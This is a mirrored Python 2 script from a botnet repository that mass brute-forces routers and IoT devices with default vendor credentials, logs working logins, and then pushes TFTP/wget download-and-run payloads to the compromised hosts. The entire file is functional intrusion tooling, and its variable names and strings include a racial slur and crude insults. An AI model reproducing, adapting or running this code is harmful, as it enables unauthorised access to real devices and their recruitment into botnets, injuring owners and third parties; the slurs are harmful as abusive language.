mirror of https://github.com/threatland/TL-BOTS
201 lines
11 KiB
Python
201 lines
11 KiB
Python
|
#!/usr/bin/env python
|
||
|
# -*- coding: utf-8 -*-
|
||
|
|
||
|
import os, socket, sys, time, threading, StringIO, argparse, random
|
||
|
jackmeoff = random.choice(["see nudes of R00tGod"])
|
||
|
raw_input('Press <ENTER> to '+jackmeoff)
|
||
|
|
||
|
print "\n"
|
||
|
print "▀█████████▄ ███ █▄ ▄███████▄ ▄██ ▄ ▀█████████▄ ▄██████▄ ▀████ ▐████▀ "
|
||
|
print " ███ ███ ███ ███ ██▀ ▄██ ███ ██▄ ███ ███ ███ ███ ███▌ ████▀ "
|
||
|
print " ███ ███ ███ ███ ▄███▀ ███▄▄▄███ ███ ███ ███ ███ ███ ▐███ "
|
||
|
print " ▄███▄▄▄██▀ ███ ███ ▀█▀▄███▀▄▄ ▀▀▀▀▀▀███ ▄███▄▄▄██▀ ███ ███ ▀███▄███▀ "
|
||
|
print "▀▀███▀▀▀██▄ ███ ███ ▄███▀ ▀ ▄██ ███ ▀▀███▀▀▀██▄ ███ ███ ████▀██▄ "
|
||
|
print " ███ ██▄ ███ ███ ▄███▀ ███ ███ ███ ██▄ ███ ███ ▐███ ▀███ "
|
||
|
print " ███ ███ ███ ███ ███▄ ▄█ ███ ███ ███ ███ ███ ███ ▄███ ███▄ "
|
||
|
print "▄█████████▀ ████████▀ ▀████████▀ ▀█████▀ ▄█████████▀ ▀██████▀ ████ ███▄ "
|
||
|
print "\n"
|
||
|
|
||
|
parser = argparse.ArgumentParser()
|
||
|
parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs")
|
||
|
parser.add_argument("-x","--execute",type=str, help="Execute using wget/tftp from list of IPs+user+pass")
|
||
|
parser.add_argument("output",type=str,help="Output filename")
|
||
|
parser.add_argument("threadcount",type=int,help="The number of threads to use")
|
||
|
args=parser.parse_args()
|
||
|
|
||
|
tpayload = "TFTPAYLOAD"
|
||
|
wpayload = "WGETPAYLOAD"
|
||
|
payload = tpayload+"\r\n"+wpayload+'\r\n'
|
||
|
|
||
|
Thread = threading.Thread
|
||
|
|
||
|
userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech']
|
||
|
passlist = [ 'root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor']
|
||
|
thread_cnt = args.threadcount
|
||
|
|
||
|
if args.brute: read_h = open(str(args.brute),'a+')
|
||
|
niggers420 = ''
|
||
|
|
||
|
def sock_read_until(tn, criteria, timeout=30):
|
||
|
shitbuffer = ''
|
||
|
start_time = time.time()
|
||
|
while time.time() - start_time < timeout:
|
||
|
shitbuffer += tn.recv(40960)
|
||
|
time.sleep(0.01)
|
||
|
if criteria in shitbuffer: return shitbuffer
|
||
|
raise Exception('sock_read_until \x1b[1;33m timeout \x1b[ 0m')
|
||
|
|
||
|
def iac_wont(tn, feature):
|
||
|
# print 'wont',feature
|
||
|
tn.send("\xff\xfb"+chr(feature))
|
||
|
def iac_dont(tn, feature):
|
||
|
# print 'dont',feature
|
||
|
tn.send("\xff\xfe"+chr(feature))
|
||
|
def mass_check(read_h):
|
||
|
try:
|
||
|
for line in open(read_h).readlines():
|
||
|
ip_info = line.split(":")
|
||
|
e = Thread(target=f, args=(ip_info[0],))
|
||
|
e.start()
|
||
|
print threading.active_count()
|
||
|
while threading.active_count() > thread_cnt:
|
||
|
pass
|
||
|
except KeyboardInterrupt: os.kill(os.getpid(),9)
|
||
|
|
||
|
def mass_pwn(targets_file):
|
||
|
try:
|
||
|
targets_file_h = open(targets_file).readlines()
|
||
|
for line in targets_file_h:
|
||
|
ip_info = line.split(":")
|
||
|
try:
|
||
|
e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2]))
|
||
|
e.start()
|
||
|
except: pass
|
||
|
print '[Thread]: ',threading.active_count()
|
||
|
while threading.active_count() > thread_cnt:
|
||
|
# time.sleep(0.5)
|
||
|
pass
|
||
|
except KeyboardInterrupt: os.kill(os.getpid(),9)
|
||
|
|
||
|
def loadem(HOST,user,password):
|
||
|
host = HOST
|
||
|
try:
|
||
|
x = ''
|
||
|
tn = socket.socket()
|
||
|
tn.connect((HOST,22))
|
||
|
# print "Connected to "+HOST
|
||
|
print tn.recv(40960)
|
||
|
tn.send(user + "\n")
|
||
|
time.sleep(1)
|
||
|
print sock_read_until(tn,":",10)
|
||
|
tn.send(password + "\n")
|
||
|
print "Spraying "+HOST
|
||
|
tn.send("sh\r\n\r\n")
|
||
|
time.sleep(0.01)
|
||
|
tn.send("shell\r\n\r\n")
|
||
|
time.sleep(0.01)
|
||
|
x += sock_read_until(tn,"#",10)
|
||
|
print '[+] Got shell! '+HOST
|
||
|
if ('rong' in x) or ('nvalid' in x) or ('ncorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('ailure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('nformation incomplete' in x): raise Exception('fucked')
|
||
|
for line in payload.split("\n"):
|
||
|
# print 'Sending line '+line
|
||
|
tn.send(line+'\r\n')
|
||
|
x = tn.recv(40960)
|
||
|
if '> ' in x: raise Exception # because fuck those.
|
||
|
# print x
|
||
|
try: arch = sock_read_until(tn,"#",3)
|
||
|
except: arch = 'dicks'
|
||
|
print arch
|
||
|
return arch
|
||
|
except: pass
|
||
|
def f(ip):
|
||
|
ip = ip.rstrip()
|
||
|
iac_wont_b = 0
|
||
|
iac_dont_b = 0
|
||
|
for user in userlist:
|
||
|
for passw in passlist:
|
||
|
x = ''
|
||
|
try:
|
||
|
tn = socket.socket()
|
||
|
tn.settimeout(35)
|
||
|
tn.connect((ip,22))
|
||
|
except Exception as e:
|
||
|
print "\x1b[1;31m[x] Failed: \x1b[0m", ip, e
|
||
|
break
|
||
|
else:
|
||
|
try:
|
||
|
x += tn.recv(40960)
|
||
|
except Exception as e:
|
||
|
print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e
|
||
|
break
|
||
|
else:
|
||
|
try:
|
||
|
niggers420=''
|
||
|
time.sleep(0.1)
|
||
|
x += tn.recv(40960)
|
||
|
sio = StringIO.StringIO(x)
|
||
|
try:
|
||
|
for i in sio.read(15):
|
||
|
# print str(ord(i))
|
||
|
if ord(i) == 251: # IAC WILL
|
||
|
iac_dont_b = 1
|
||
|
elif ord(i) == 253: # IAC DO
|
||
|
# print 'set wont b'
|
||
|
iac_wont_b = 1
|
||
|
elif iac_wont_b == 1:
|
||
|
iac_wont(tn,ord(i))
|
||
|
iac_wont_b = 0
|
||
|
elif iac_dont_b == 1:
|
||
|
iac_dont(tn,ord(i))
|
||
|
iac_dont_b = 0
|
||
|
except: print "IAC wtf?"
|
||
|
# print 'iac done!'
|
||
|
tn.send(user + "\r\n")
|
||
|
time.sleep(0.01)
|
||
|
if 'User Access Verification' in x: raise Exception('cisco dicks')
|
||
|
x += sock_read_until(tn,":")
|
||
|
if 'ogin:' not in x and 'sername:' not in x: raise Exception('no login?')
|
||
|
tn.send(passw + "\r\n\r\n")
|
||
|
x += tn.recv(409600)
|
||
|
tn.send("sh\r\n\r\n")
|
||
|
time.sleep(0.01)
|
||
|
tn.send("shell\r\n\r\n")
|
||
|
time.sleep(0.01)
|
||
|
sock_read_until(tn,"#")
|
||
|
tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\r\n\r\n")
|
||
|
time.sleep(0.01)
|
||
|
x += tn.recv(409600)
|
||
|
time.sleep(0.01)
|
||
|
try:
|
||
|
x += sock_read_until(tn,"binfagt")
|
||
|
# print x
|
||
|
# if 'Welcome to ZTE' in x: raise Exception('ZTE')
|
||
|
if 'binfagt' not in x: raise Exception('no binfagt')
|
||
|
if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x: raise Exception('no prompt')
|
||
|
if ('rong' in x) or ('nvalid' in x) or ('ncorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('ailure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('nformation incomplete' in x): raise Exception('fucked')
|
||
|
except Exception as e:
|
||
|
print "[failed execution]", e,ip.rstrip()
|
||
|
continue
|
||
|
else:
|
||
|
file_h = open(args.output,'a+')
|
||
|
file_h.write(ip.rstrip() + ":" + user + ":" + passw+'\n')
|
||
|
file_h.close()
|
||
|
print '\x1b[1;32m[*] Execution on: \x1b[0m ', ip
|
||
|
break
|
||
|
except Exception as e:
|
||
|
# print "Timeout: ", ip, e
|
||
|
continue
|
||
|
continue
|
||
|
continue
|
||
|
continue
|
||
|
return "my nutsack"
|
||
|
|
||
|
|
||
|
#p.join()
|
||
|
|
||
|
|
||
|
if args.execute:
|
||
|
mass_pwn(args.execute)
|
||
|
elif args.brute: mass_check(args.brute)
|
||
|
|